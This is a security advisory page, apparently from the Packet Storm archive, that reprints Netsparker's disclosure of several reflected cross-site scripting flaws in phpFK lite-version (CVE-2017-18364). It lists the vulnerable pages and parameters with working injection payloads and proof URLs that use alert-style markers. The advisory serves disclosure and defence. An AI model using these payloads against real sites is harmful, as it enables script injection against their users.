exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

phpFK lite-version Cross Site Scripting

phpFK lite-version Cross Site Scripting
Posted Jul 10, 2019
Authored by Daniel Bishtawi | Site netsparker.com

phpFK lite-version suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2017-18364
SHA-256 | bfadb994d6bd3b1cd2775392aa603af686c5d2de5375e627da22472373722c76

phpFK lite-version Cross Site Scripting

Change Mirror Download
*Information:*

Advisory by Netsparker
Name: Multiple Cross-site Scripting Vulnerabilities in phpFK
Affected Software: phpFK
Affected Versions: lite-version
Homepage: https://www.frank-karau.de/
Vulnerability: Reflected Cross-site Scripting
Severity: 7.4 High
Status: Not Fixed
CVSS Score (3.0): CVE-2017-18364
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-006

*Technical Details:*

/faq.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern :
'"--></style></scRipt><scRipt>netsparker(0x00164F)</scRipt>
Proof URL : http://
{domain}/faq.php?'"--></style></scRipt><scRipt>alert(0x00164F)</scRipt>

/members.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern :
'"--></style></scRipt><scRipt>netsparker(0x00158E)</scRipt>
Proof URL : http://
{domain}/members.php?'"--></style></scRipt><scRipt>alert(0x00158E)</scRipt>

/members.php (search (GET))

Parameter Name : search
Parameter Type : GET
Attack Pattern : x%22+onmouseover%3dnetsparker(0x0069A0)+x%3d%22
Proof URL : http://
{domain}/members.php?search=x"%20onmouseover=netsparker(0x0069A0)%20x="&sort=username

/members.php (search (POST))

Parameter Name : search
Parameter Type : POST
Attack Pattern : x%22+onmouseover%3dnetsparker(0x006EBA)+x%3d%22

/search.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern : '"--></style></scRipt><scRipt>netsparker(0x00171D)</scRipt>
Proof URL : http://
{domain}/search.php?'"--></style></scRipt><scRipt>alert(0x00171D)</scRipt>

/user.php (user (GET))

Parameter Name : user
Parameter Type : GET
Attack Pattern :
%3c%2ftitle%3e%3cscRipt%3enetsparker(0x001122)%3c%2fscRipt%3e
Proof URL : http://
{domain}/user.php?user=</title><scRipt>netsparker(0x001122)</scRipt>

For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-006-reflected-cross-site-scripting-in-phpfk/

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close